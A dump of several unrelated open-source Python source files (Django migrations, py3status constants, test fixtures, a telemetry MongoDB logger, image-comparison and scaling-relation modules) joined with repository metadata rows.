items = modulestore().get_orphans(old_location, DETACHED_CATEGORIES, 'draft')
for item in items:
modulestore('draft').delete_item(item, True)
return JsonResponse({'deleted': items})
else:
raise PermissionDenied()
def _get_module_info(usage_loc, rewrite_static_links=True):
"""
metadata, data, id representation of a leaf module fetcher.
:param usage_loc: A BlockUsageLocator
"""
old_location = loc_mapper().translate_locator_to_location(usage_loc)
store = get_modulestore(old_location)
try:
module = store.get_item(old_location)
except ItemNotFoundError:
if old_location.category in CREATE_IF_NOT_FOUND:
# Create a new one for certain categories only. Used for course info handouts.
store.create_and_save_xmodule(old_location)
module = store.get_item(old_location)
else:
raise
data = module.data
if rewrite_static_links:
# we pass a partially bogus course_id as we don't have the RUN information passed yet
# through the CMS. Also the contentstore is also not RUN-aware at this point in time.
data = replace_static_urls(
module.data,
None,
course_id=module.location.org + '/' + module.location.course + '/BOGUS_RUN_REPLACE_WHEN_AVAILABLE'
)
# Note that children aren't being returned until we have a use case.
return {
'id': unicode(usage_loc),
'data': data,
'metadata': own_metadata(module)
}
| agpl-3.0 | -2,731,989,271,063,219,000 | 42.186158 | 122 | 0.6336 | false |
amureki/lunch-with-channels | places/migrations/0001_initial.py | 1 | 1222 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-31 20:24
from __future__ import unicode_literals
from django.db import migrations, models
import django_extensions.db.fields
import stdimage.models
import stdimage.utils
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Place',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('name', models.CharField(max_length=255, verbose_name='Name')),
('image', stdimage.models.StdImageField(blank=True, null=True, upload_to=stdimage.utils.UploadToUUID(path='places'), verbose_name='Image')),
('address', models.CharField(max_length=255, verbose_name='Address')),
],
options={
'ordering': ('-created',),
},
),
]
| mit | -6,530,141,570,635,881,000 | 36.030303 | 156 | 0.615385 | false |
smartboyathome/Wonderland-Engine | install_check_to_white_rabbit.py | 1 | 1971 | #!/usr/bin/env python2
"""
Copyright (c) 2012 Alexander Abbott
This file is part of the Cheshire Cyber Defense Scoring Engine (henceforth
referred to as Cheshire).
Cheshire is free software: you can redistribute it and/or modify it under
the terms of the GNU Affero General Public License as published by the
Free Software Foundation, either version 3 of the License, or (at your
option) any later version.
Cheshire is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for
more details.
You should have received a copy of the GNU Affero General Public License
along with Cheshire. If not, see <http://www.gnu.org/licenses/>.
"""
import WhiteRabbit, os, sys, argparse, shutil, py_compile
class CannotOpenFile(Exception):
def __init__(self, directory):
self.directory = directory
def __repr__(self):
return "Cannot write a file at '{}'.".format(self.directory)
if __name__ == '__main__':
exit_code = 0
parser = argparse.ArgumentParser(description="A tool to help install checks into White Rabbit.")
parser.add_argument('python_file', nargs='*')
args = parser.parse_args()
check_dir = os.path.join(os.path.split(WhiteRabbit.__file__)[0], 'checks')
if not os.path.exists(check_dir) or not os.access(check_dir, os.W_OK):
raise CannotOpenFile(check_dir)
for f in args.python_file:
abspath = os.path.abspath(f)
if not os.path.exists(abspath) or not os.access(abspath, os.R_OK):
print "Could not read a file at '{}'.".format(abspath)
exit_code = 1
continue
path, name = os.path.split(abspath)
new_path = os.path.join(check_dir, name)
shutil.copy(abspath, new_path)
py_compile.compile(new_path)
sys.exit(exit_code) | agpl-3.0 | 2,859,696,470,728,600,000 | 39.244898 | 100 | 0.674277 | false |
Andrwe/py3status | py3status/constants.py | 1 | 7015 | # This file contains various useful constants for py3status
GENERAL_DEFAULTS = {
"color_bad": "#FF0000",
"color_degraded": "#FFFF00",
"color_good": "#00FF00",
"color_separator": "#333333",
"colors": False,
"interval": 5,
"output_format": "i3bar",
}
MAX_NESTING_LEVELS = 4
TIME_FORMAT = "%Y-%m-%d %H:%M:%S"
TZTIME_FORMAT = "%Y-%m-%d %H:%M:%S %Z"
TIME_MODULES = ["time", "tztime"]
I3S_INSTANCE_MODULES = [
"battery",
"cpu_temperature",
"disk",
"ethernet",
"memory",
"path_exists",
"run_watch",
"tztime",
"volume",
"wireless",
]
I3S_SINGLE_NAMES = ["cpu_usage", "ddate", "ipv6", "load", "time"]
I3S_ALLOWED_COLORS = ["color_bad", "color_good", "color_degraded"]
# i3status modules that allow colors to be passed.
# general section also allows colors so is included.
I3S_COLOR_MODULES = ["general", "battery", "cpu_temperature", "disk", "load"]
I3S_MODULE_NAMES = I3S_SINGLE_NAMES + I3S_INSTANCE_MODULES
CONFIG_FILE_SPECIAL_SECTIONS = ["general", "py3status"]
ERROR_CONFIG = """
general {colors = true interval = 60}
order += "static_string py3status"
order += "tztime local"
order += "group error"
static_string py3status {format = "py3status"}
tztime local {format = "%c"}
group error{
button_next = 1
button_prev = 0
fixed_width = False
format = "{output}"
static_string error_min {format = "CONFIG ERROR" color = "#FF0000"}
static_string error {format = "$error" color = "#FF0000"}
}
"""
COLOR_NAMES_EXCLUDED = ["good", "bad", "degraded", "separator", "threshold", "None"]
COLOR_NAMES = {
"aliceblue": "#F0F8FF",
"antiquewhite": "#FAEBD7",
"aqua": "#00FFFF",
"aquamarine": "#7FFFD4",
"azure": "#F0FFFF",
"beige": "#F5F5DC",
"bisque": "#FFE4C4",
"black": "#000000",
"blanchedalmond": "#FFEBCD",
"blue": "#0000FF",
"blueviolet": "#8A2BE2",
"brown": "#A52A2A",
"burlywood": "#DEB887",
"cadetblue": "#5F9EA0",
"chartreuse": "#7FFF00",
"chocolate": "#D2691E",
"coral": "#FF7F50",
"cornflowerblue": "#6495ED",
"cornsilk": "#FFF8DC",
"crimson": "#DC143C",
"cyan": "#00FFFF",
"darkblue": "#00008B",
"darkcyan": "#008B8B",
"darkgoldenrod": "#B8860B",
"darkgray": "#A9A9A9",
"darkgrey": "#A9A9A9",
"darkgreen": "#006400",
"darkkhaki": "#BDB76B",
"darkmagenta": "#8B008B",
"darkolivegreen": "#556B2F",
"darkorange": "#FF8C00",
"darkorchid": "#9932CC",
"darkred": "#8B0000",
"darksalmon": "#E9967A",
"darkseagreen": "#8FBC8F",
"darkslateblue": "#483D8B",
"darkslategray": "#2F4F4F",
"darkslategrey": "#2F4F4F",
"darkturquoise": "#00CED1",
"darkviolet": "#9400D3",
"deeppink": "#FF1493",
"deepskyblue": "#00BFFF",
"dimgray": "#696969",
"dimgrey": "#696969",
"dodgerblue": "#1E90FF",
"firebrick": "#B22222",
"floralwhite": "#FFFAF0",
"forestgreen": "#228B22",
"fuchsia": "#FF00FF",
"gainsboro": "#DCDCDC",
"ghostwhite": "#F8F8FF",
"gold": "#FFD700",
"goldenrod": "#DAA520",
"gray": "#808080",
"grey": "#808080",
"green": "#008000",
"greenyellow": "#ADFF2F",
"honeydew": "#F0FFF0",
"hotpink": "#FF69B4",
"indianred": "#CD5C5C",
"indigo": "#4B0082",
"ivory": "#FFFFF0",
"khaki": "#F0E68C",
"lavender": "#E6E6FA",
"lavenderblush": "#FFF0F5",
"lawngreen": "#7CFC00",
"lemonchiffon": "#FFFACD",
"lightblue": "#ADD8E6",
"lightcoral": "#F08080",
"lightcyan": "#E0FFFF",
"lightgoldenrodyellow": "#FAFAD2",
"lightgray": "#D3D3D3",
"lightgrey": "#D3D3D3",
"lightgreen": "#90EE90",
"lightpink": "#FFB6C1",
"lightsalmon": "#FFA07A",
"lightseagreen": "#20B2AA",
"lightskyblue": "#87CEFA",
"lightslategray": "#778899",
"lightslategrey": "#778899",
"lightsteelblue": "#B0C4DE",
"lightyellow": "#FFFFE0",
"lime": "#00FF00",
"limegreen": "#32CD32",
"linen": "#FAF0E6",
"magenta": "#FF00FF",
"maroon": "#800000",
"mediumaquamarine": "#66CDAA",
"mediumblue": "#0000CD",
"mediumorchid": "#BA55D3",
"mediumpurple": "#9370DB",
"mediumseagreen": "#3CB371",
"mediumslateblue": "#7B68EE",
"mediumspringgreen": "#00FA9A",
"mediumturquoise": "#48D1CC",
"mediumvioletred": "#C71585",
"midnightblue": "#191970",
"mintcream": "#F5FFFA",
"mistyrose": "#FFE4E1",
"moccasin": "#FFE4B5",
"navajowhite": "#FFDEAD",
"navy": "#000080",
"oldlace": "#FDF5E6",
"olive": "#808000",
"olivedrab": "#6B8E23",
"orange": "#FFA500",
"orangered": "#FF4500",
"orchid": "#DA70D6",
"palegoldenrod": "#EEE8AA",
"palegreen": "#98FB98",
"paleturquoise": "#AFEEEE",
"palevioletred": "#DB7093",
"papayawhip": "#FFEFD5",
"peachpuff": "#FFDAB9",
"peru": "#CD853F",
"pink": "#FFC0CB",
"plum": "#DDA0DD",
"powderblue": "#B0E0E6",
"purple": "#800080",
"rebeccapurple": "#663399",
"red": "#FF0000",
"rosybrown": "#BC8F8F",
"royalblue": "#4169E1",
"saddlebrown": "#8B4513",
"salmon": "#FA8072",
"sandybrown": "#F4A460",
"seagreen": "#2E8B57",
"seashell": "#FFF5EE",
"sienna": "#A0522D",
"silver": "#C0C0C0",
"skyblue": "#87CEEB",
"slateblue": "#6A5ACD",
"slategray": "#708090",
"slategrey": "#708090",
"snow": "#FFFAFA",
"springgreen": "#00FF7F",
"steelblue": "#4682B4",
"tan": "#D2B48C",
"teal": "#008080",
"thistle": "#D8BFD8",
"tomato": "#FF6347",
"turquoise": "#40E0D0",
"violet": "#EE82EE",
"wheat": "#F5DEB3",
"white": "#FFFFFF",
"whitesmoke": "#F5F5F5",
"yellow": "#FFFF00",
"yellowgreen": "#9ACD32",
}
ON_TRIGGER_ACTIONS = ["refresh", "refresh_and_freeze"]
POSITIONS = ["left", "center", "right"]
RETIRED_MODULES = {
"nvidia_temp": {
"new": ["nvidia_smi"],
"msg": "Module {old} has been replaced with a module {new}.",
},
"scratchpad_async": {
"new": ["scratchpad"],
"msg": "Module {old} has been replaced with a consolidated module {new}.",
},
"scratchpad_counter": {
"new": ["scratchpad"],
"msg": "Module {old} has been replaced with a consolidated module {new}.",
},
"window_title": {
"new": ["window"],
"msg": "Module {old} has been replaced with a consolidated module {new}.",
},
"window_title_async": {
"new": ["window"],
"msg": "Module {old} has been replaced with a consolidated module {new}.",
},
"weather_yahoo": {
"new": ["weather_owm"],
"msg": "Module {old} is no longer available due to retired Yahoo Weather APIs and new Oath requirements. You can try a different module {new}.",
},
"xkb_layouts": {
"new": ["xkb_input"],
"msg": "Module {old} has been replaced with a module {new} to support sway too.",
},
}
MARKUP_LANGUAGES = ["pango", "none"]
| bsd-3-clause | -4,436,011,993,799,610,400 | 26.727273 | 152 | 0.556522 | false |
evernote/pootle | tests/fixtures/models/project.py | 1 | 1655 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014 Evernote Corporation
#
# This file is part of Pootle.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
import pytest
def _require_project(code, name, source_language, **kwargs):
"""Helper to get/create a new project."""
from pootle_project.models import Project
criteria = {
'code': code,
'fullname': name,
'source_language': source_language,
'checkstyle': 'standard',
'localfiletype': 'po',
'treestyle': 'auto',
}
criteria.update(kwargs)
new_project, created = Project.objects.get_or_create(**criteria)
return new_project
@pytest.fixture
def tutorial(projects, english):
"""Require `tutorial` test project."""
return _require_project('tutorial', 'Tutorial', english)
@pytest.fixture
def tutorial_disabled(projects, english):
"""Require `tutorial-disabled` test project in a disabled state."""
return _require_project('tutorial-disabled', 'Tutorial', english,
disabled=True)
| gpl-2.0 | 5,182,014,303,893,477,000 | 30.826923 | 71 | 0.69003 | false |
ikargis/horizon_fod | horizon/templatetags/sizeformat.py | 1 | 2802 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Template tags for displaying sizes
"""
from django import template
from django.utils import formats
from django.utils import translation
register = template.Library()
def int_format(value):
return int(value)
def float_format(value):
return formats.number_format(round(value, 1), 1)
def filesizeformat(bytes, filesize_number_format):
try:
bytes = float(bytes)
except (TypeError, ValueError, UnicodeDecodeError):
return translation.ungettext_lazy("%(size)d byte",
"%(size)d bytes", 0) % {'size': 0}
if bytes < 1024:
return translation.ungettext_lazy("%(size)d",
"%(size)d", bytes) % {'size': bytes}
if bytes < 1024 * 1024:
return translation.ugettext_lazy("%s KB") % \
filesize_number_format(bytes / 1024)
if bytes < 1024 * 1024 * 1024:
return translation.ugettext_lazy("%s MB") % \
filesize_number_format(bytes / (1024 * 1024))
if bytes < 1024 * 1024 * 1024 * 1024:
return translation.ugettext_lazy("%s GB") % \
filesize_number_format(bytes / (1024 * 1024 * 1024))
if bytes < 1024 * 1024 * 1024 * 1024 * 1024:
return translation.ugettext_lazy("%s TB") % \
filesize_number_format(bytes / (1024 * 1024 * 1024 * 1024))
return translation.ugettext_lazy("%s PB") % \
filesize_number_format(bytes / (1024 * 1024 * 1024 * 1024 * 1024))
@register.filter(name='mbformat')
def mbformat(mb):
if not mb:
return 0
return filesizeformat(mb * 1024 * 1024, int_format).replace(' ', '')
@register.filter(name='mb_float_format')
def mb_float_format(mb):
"""Takes a size value in mb, and prints returns the data in a
saner unit.
"""
if not mb:
return 0
return filesizeformat(mb * 1024 * 1024, float_format)
@register.filter(name='diskgbformat')
def diskgbformat(gb):
return filesizeformat(gb * 1024 * 1024 * 1024,
float_format).replace(' ', '')
| apache-2.0 | -9,080,420,568,618,808,000 | 31.206897 | 78 | 0.654176 | false |
zerotired/kotori | kotori/vendor/hydro2motion/database/mongo.py | 2 | 4486 | # -*- coding: utf-8 -*-
# (c) 2015 Andreas Motl, Elmyra UG <[email protected]>
import txmongo
from autobahn.twisted.wamp import ApplicationRunner, ApplicationSession
from twisted.internet.defer import inlineCallbacks
from twisted.internet.interfaces import ILoggingContext
from twisted.python import log
from zope.interface.declarations import implementer
@implementer(ILoggingContext)
class MongoDatabaseService(ApplicationSession):
"""An application component for logging telemetry data to MongoDB databases"""
#@inlineCallbacks
#def __init__(self, config):
# ApplicationSession.__init__(self, config)
def logPrefix(self):
"""
Return a prefix matching the class name, to identify log messages
related to this protocol instance.
"""
return self.__class__.__name__
#@inlineCallbacks
def onJoin(self, details):
print("Realm joined (WAMP session started).")
# subscribe to telemetry data channel
self.subscribe(self.receive, u'de.elmyra.kotori.telemetry.data')
self.startDatabase()
#self.leave()
#@inlineCallbacks
def startDatabase(self):
#self.mongo = yield txmongo.MongoConnection(host='127.0.0.0', port=27017)
self.mongo = yield txmongo.MongoConnection()
def onLeave(self, details):
print("Realm left (WAMP session ended).")
ApplicationSession.onLeave(self, details)
def onDisconnect(self):
print("Transport disconnected.")
#reactor.stop()
#@inlineCallbacks
def receive(self, data):
#print "RECEIVE:", data
# decode wire data
payload = data.split(';')
try:
MSG_ID = int(payload[0])
V_FC = int(payload[1])
V_CAP = int(payload[2])
A_ENG = int(payload[3])
A_CAP = int(payload[4])
T_O2_In = int(payload[5])
T_O2_Out = int(payload[6])
T_FC_H2O_Out = int(payload[7])
Water_In = int(payload[8])
Water_Out = int(payload[9])
Master_SW = bool(payload[10])
CAP_Down_SW = bool(payload[11])
Drive_SW = bool(payload[12])
FC_state = bool(payload[13])
Mosfet_state = bool(payload[14])
Safety_state = bool(payload[15])
Air_Pump_load = float(payload[16])
Mosfet_load = int(payload[17])
Water_Pump_load = int(payload[18])
Fan_load = int(payload[19])
Acc_X = int(payload[20])
Acc_Y = int(payload[21])
Acc_Z = int(payload[22])
AUX = float(payload[23])
GPS_X = int(payload[24])
GPS_Y = int(payload[25])
GPS_Z = int(payload[26])
GPS_Speed = int(payload[27])
V_Safety = int(payload[28])
H2_Level = int(payload[29])
O2_calc = float(payload[30])
lat = float(payload[31])
lng = float(payload[32])
# store data to database
if self.mongo:
telemetry = self.mongo.kotori.telemetry
yield telemetry.insert(dict(MSG_ID = MSG_ID, V_FC = V_FC, V_CAP = V_CAP, A_ENG = A_ENG, A_CAP = A_CAP, T_O2_In = T_O2_In, T_O2_Out = T_O2_Out, T_FC_H2O_Out = T_FC_H2O_Out, Water_In = Water_In, Water_Out = Water_Out, Master_SW = Master_SW, CAP_Down_SW = CAP_Down_SW, Drive_SW = Drive_SW, FC_state = FC_state, Mosfet_state = Mosfet_state, Safety_state = Safety_state, Air_Pump_load = Air_Pump_load, Mosfet_load = Mosfet_load, Water_Pump_load = Water_Pump_load, Fan_load = Fan_load, Acc_X = Acc_X, Acc_Y = Acc_Y, Acc_Z = Acc_Z, AUX = AUX, GPS_X = GPS_X, GPS_Y = GPS_Y, GPS_Z = GPS_Z, GPS_Speed = GPS_Speed, V_Safety = V_Safety, H2_Level = H2_Level, O2_calc = O2_calc, lat = lat, lng = lng))
except ValueError:
print('Could not decode data: {}'.format(data))
def boot_mongo_database(websocket_uri, debug=False, trace=False):
print 'INFO: Starting mongo database service, connecting to broker', websocket_uri
runner = ApplicationRunner(websocket_uri, u'kotori-realm', debug=trace, debug_wamp=debug, debug_app=debug)
runner.run(MongoDatabaseService, start_reactor=False)
| agpl-3.0 | 2,517,970,087,876,669,000 | 42.134615 | 703 | 0.569996 | false |
enriquepablo/terms | terms/core/tests.py | 1 | 2966 | # Copyright (c) 2007-2012 by Enrique Pérez Arnaud <[email protected]>
#
# This file is part of the terms project.
# https://github.com/enriquepablo/terms
#
# The terms project is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# The terms project is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with any part of the terms project.
# If not, see <http://www.gnu.org/licenses/>.
import sys
import os
from configparser import ConfigParser
import nose
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from terms.core.terms import Base
from terms.core.network import Network
from terms.core.compiler import KnowledgeBase
CONFIG = '''
[test]
dbms = postgresql://terms:terms@localhost
dbname = test
#dbms = sqlite://
#dbname = :memory:
time = normal
import =
instant_duration = 0
'''
def test_terms(): # test generator
# read contents of tests/
# feed each test to run_npl
d = os.path.dirname(sys.modules['terms.core'].__file__)
d = os.path.join(d, 'tests')
files = os.listdir(d)
config = ConfigParser()
config.read_string(CONFIG)
config = config['test']
for f in files:
if f.endswith('.test'):
address = '%s/%s' % (config['dbms'], config['dbname'])
engine = create_engine(address)
Session = sessionmaker(bind=engine)
session = Session()
Base.metadata.create_all(engine)
Network.initialize(session)
kb = KnowledgeBase(session, config,
lex_optimize=False,
yacc_optimize=False,
yacc_debug=True)
yield run_terms, kb, os.path.join(d, f)
kb.session.close()
Base.metadata.drop_all(engine)
def run_terms(kb, fname):
# open file, read lines
# tell assertions
# compare return of questions with provided output
with open(fname) as f:
resp = kb.no_response
for sen in f:
sen = sen.rstrip()
if resp is not kb.no_response:
sen = sen.strip('.')
pmsg = 'returned "%s" is not "%s" at line %d for query: %s'
msg = pmsg % (resp, sen,
kb.parser.lex.lexer.lineno,
kb.parser.lex.lexer.lexdata)
nose.tools.assert_equals(sen, resp, msg=msg)
resp = kb.no_response
elif sen and not sen.startswith('#'):
resp = kb.process_line(sen)
| gpl-3.0 | -4,042,667,240,511,713,300 | 32.693182 | 75 | 0.619224 | false |
pmacosta/putil | sbin/compare_image_dirs.py | 1 | 3856 | #!/usr/bin/env python
# compare_image_dirs.py
# Copyright (c) 2013-2016 Pablo Acosta-Serafini
# See LICENSE for details
# pylint: disable=C0111
# Standard library imports
from __future__ import print_function
import argparse
import glob
import os
import sys
# PyPI imports
import numpy
import scipy
import scipy.misc
# Putil imports
import sbin.functions
###
# Functions
###
def compare_images(fname1, fname2, no_print=True, imgtol=1e-3):
""" Compare two images by calculating Manhattan and Zero norms """
# Source: http://stackoverflow.com/questions/189943/
# how-can-i-quantify-difference-between-two-images
for item in (fname1, fname2):
if not os.path.exists(item):
return False
img1 = scipy.misc.imread(fname1).astype(float)
img2 = scipy.misc.imread(fname2).astype(float)
if img1.size != img2.size:
m_norm, z_norm = 2*[2*imgtol]
else:
# Element-wise for Scipy arrays
diff = img1-img2
# Manhattan norm
m_norm = scipy.sum(numpy.abs(diff))
# Zero norm
z_norm = scipy.linalg.norm(diff.ravel(), 0)
result = bool((m_norm < imgtol) and (z_norm < imgtol))
if not no_print:
print(
'Image 1: {0}, Image 2: {1} -> ({2}, {3}) [{4}]'.format(
fname1, fname2, m_norm, z_norm, result
)
)
return result
def main(no_print, dir1, dir2):
""" Compare two images """
# pylint: disable=R0912
for item in [dir1, dir2]:
if not os.path.exists(item):
raise IOError('Directory {0} could not be found'.format(item))
dir1_images = set(
[
os.path.basename(item)
for item in glob.glob(os.path.join(dir1, '*.png'))
]
)
dir2_images = set(
[
os.path.basename(item)
for item in glob.glob(os.path.join(dir2, '*.png'))
]
)
yes_list = []
no_list = []
dir1_list = sorted(list(dir1_images-dir2_images))
dir2_list = sorted(list(dir2_images-dir1_images))
global_result = bool((not dir1_list) and (not dir2_list))
for image in sorted(list(dir1_images & dir2_images)):
result = compare_images(
os.path.join(dir1, image), os.path.join(dir2, image)
)
if (not result) and (not no_print):
no_list.append(image)
global_result = False
elif not no_print:
yes_list.append(image)
print('Files only in {0}'.format(dir1))
if dir1_list:
for item in dir1_list:
print(' {0}'.format(item))
else:
print(' None')
print('Files only in {0}'.format(dir2))
if dir2_list:
for item in dir2_list:
print(' {0}'.format(item))
else:
print(' None')
print('Matching files')
if yes_list:
for item in yes_list:
print(' {0}'.format(item))
else:
print(' None')
print('Mismatched files')
if no_list:
for item in no_list:
print(' {0}'.format(item))
else:
print(' None')
if global_result and (not no_print):
print(sbin.functions.pcolor('Directories ARE equal', 'green'))
elif (not global_result) and (not no_print):
print(sbin.functions.pcolor('Directories ARE NOT equal', 'red'))
sys.exit(1 if not global_result else 0)
if __name__ == '__main__':
PARSER = argparse.ArgumentParser(
description='Compare image directories'
)
PARSER.add_argument(
'-q', '--quiet',
help='suppress messages',
action="store_true",
default=False
)
PARSER.add_argument('dir1', help='First directory to compare', nargs=1)
PARSER.add_argument('dir2', help='Second directory to compare', nargs=1)
ARGS = PARSER.parse_args()
main(ARGS.quiet, ARGS.dir1[0], ARGS.dir2[0])
| mit | 1,650,487,592,812,506,000 | 29.125 | 76 | 0.582469 | false |
kmshi/miroguide | channelguide/subscriptions/views.py | 1 | 1962 | from django.conf import settings
from django.core.urlresolvers import resolve, Resolver404
from django.views.decorators.cache import never_cache
from django.http import HttpResponse
from django.shortcuts import get_object_or_404
from channelguide import util
from channelguide.channels.models import Channel
from channelguide.channels.views import channel as channel_view
from channelguide.guide.views.firsttime import index as firsttime_index
from channelguide.subscriptions.models import Subscription
@never_cache
def subscribe_hit(request, id):
"""Used by our ajax call handleSubscriptionLink. It will get a security
error if we redirect it to a URL outside the channelguide, so we don't do
that
"""
ids = [id] + [int(k) for k in request.GET]
for id in ids:
channel = get_object_or_404(Channel, pk=id)
referer = request.META.get('HTTP_REFERER', '')
ignore_for_recommendations = False
if referer.startswith(settings.BASE_URL_FULL):
referer = util.chop_prefix(referer, settings.BASE_URL_FULL)
if not referer.startswith("/"):
referer = '/' + referer # make sure it starts with a slash
try:
resolved = resolve(referer)
except Resolver404:
pass
else:
if resolved is not None:
func, args, kwargs = resolved
if func == channel_view and args[0] != id:
ignore_for_recommendations = True
elif func == firsttime_index:
ignore_for_recommendations = True
ip = request.META.get('REMOTE_ADDR', '0.0.0.0')
if ip == '127.0.0.1':
ip = request.META.get('HTTP_X_FORWARDED_FOR', '0.0.0.0')
Subscription.objects.add(
channel, ip,
ignore_for_recommendations=ignore_for_recommendations)
return HttpResponse("Hit successfull")
| agpl-3.0 | -7,790,385,285,968,047,000 | 40.744681 | 77 | 0.634557 | false |
vincent-noel/libSigNetSim | libsignetsim/model/math/DAE.py | 1 | 2339 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2017 Vincent Noel ([email protected])
#
# This file is part of libSigNetSim.
#
# libSigNetSim is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# libSigNetSim is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with libSigNetSim. If not, see <http://www.gnu.org/licenses/>.
"""
This file ...
"""
from __future__ import print_function
from libsignetsim.model.math.MathFormula import MathFormula
from libsignetsim.model.math.sympy_shortcuts import SympySymbol, SympyEqual, SympyInteger
from sympy import solve, srepr, pretty
class DAE(object):
""" DAE class """
def __init__ (self, model):
""" Constructor of ode class """
self.__model = model
self.__definition = None
def new(self, definition):
self.__definition = definition
def getDefinition(self):
return self.__definition
def getFormula(self, rawFormula=True, developped=False):
if developped:
t_definition = self.__definition.getDeveloppedInternalMathFormula(rawFormula=rawFormula)
else:
t_definition = self.__definition.getInternalMathFormula(rawFormula=rawFormula)
return SympyEqual(
t_definition,
SympyInteger(0)
)
def __str__(self):
return "%s = 0" % str(self.__definition.getDeveloppedInternalMathFormula())
def pprint(self):
print(
pretty(
SympyEqual(
self.__definition.getDeveloppedInternalMathFormula(),
SympyInteger(0)
)
)
)
def solve(self):
to_solve = []
for var in self.__definition.getDeveloppedInternalMathFormula().atoms(SympySymbol):
variable = self.__model.listOfVariables.getBySymbol(var)
if variable is not None and variable.isAlgebraic():
to_solve.append(var)
return (to_solve[0], solve(self.__definition.getDeveloppedInternalMathFormula(), to_solve))
def isValid(self):
return self.__definition.getInternalMathFormula() != MathFormula.ZERO
| gpl-3.0 | 506,651,916,005,281,900 | 25.885057 | 93 | 0.730654 | false |
jocassid/PyDataGenerator | testDataGenerator.py | 1 | 2454 | #!/usr/bin/python3
import unittest
from DataGenerator import \
InMemoryDataSource, \
Person, \
Household
import locale
# View all available locales
# locale -a
#
# View current locale settings
# locale
#
# Add locale to system
# sudo locale-gen de_DE.utf8
# class TestDataSource(unittest.TestCase):
# pass
#
#
class TestInMemoryDataSource(unittest.TestCase):
def testStuff(self):
dataSource = InMemoryDataSource()
values = ['John', 'Robert', 'William', 'Andrew']
dataSource.loadDataItem('maleNames','en_us', values=values)
values = ['Elizabeth', 'Jennifer', 'Mary', 'Ann']
dataSource.loadDataItem('femaleNames', 'en_us', values=values)
values = ['Smith', 'Jones', 'Thomas', 'Davis']
dataSource.loadDataItem('lastNames', 'en_us', values=values)
person = Person(dataSource)
print(str(person))
for i in range(5):
family = Household(dataSource)
print(str(family))
# dataSource.loadDataItems(
# './locales',
# ['maleFirstNames'])
#
# personGenerator = dg.PersonGenerator(dataSource)
# for i in range(10):
# print(personGenerator.next(sex='M'))
# class TestSqliteDataSource(unittest.TestCase):
#
# def testStuff(self):
# dataSource = dg.SqliteDataSource()
# dataSource.open('./test.sqlite3')
# dataSource.loadDataItems(
# './locales',
# ['maleFirstNames'])
#
# personGenerator = dg.PersonGenerator(dataSource)
# for i in range(10):
# print(personGenerator.next(sex='M'))
#
# dataSource.close()
# class TestDataSource(unittest.TestCase):
#
# def testload_currentLocale(self):
# locale.setlocale(locale.LC_ALL, 'de_DE.utf8')
#
# # print(str(locale.localeconv()))
# # print(str(locale.getdefaultlocale()))
# #print(str(locale.getlocale()))
# dg.DATA_SOURCE.load(
# './locales',
# './data.sqlite',
# None,
# ['maleFirstNames'])
#
#
# class TestRandomFirstName(unittest.TestCase):
#
# def setUp(self):
# pass
#
# def testDefaultLocal(self):
# print(dg.randomFirstName(sex='M'))
if __name__ == '__main__':
unittest.main()
| mit | 8,514,053,047,799,457,000 | 23.54 | 70 | 0.55705 | false |
gem/oq-engine | openquake/hazardlib/scalerel/ceus2011.py | 1 | 1363 | # -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (C) 2013-2021 GEM Foundation
#
# OpenQuake is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# OpenQuake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>.
"""
Module :mod:`openquake.hazardlib.scalerel.ceus2011` implements
:class:`CEUS2011`.
"""
from openquake.hazardlib.scalerel.base import BaseMSR
class CEUS2011(BaseMSR):
"""
Magnitude-Scaling Relationship used for calculations in the CEUS SSC
project completed in 2011.
References:
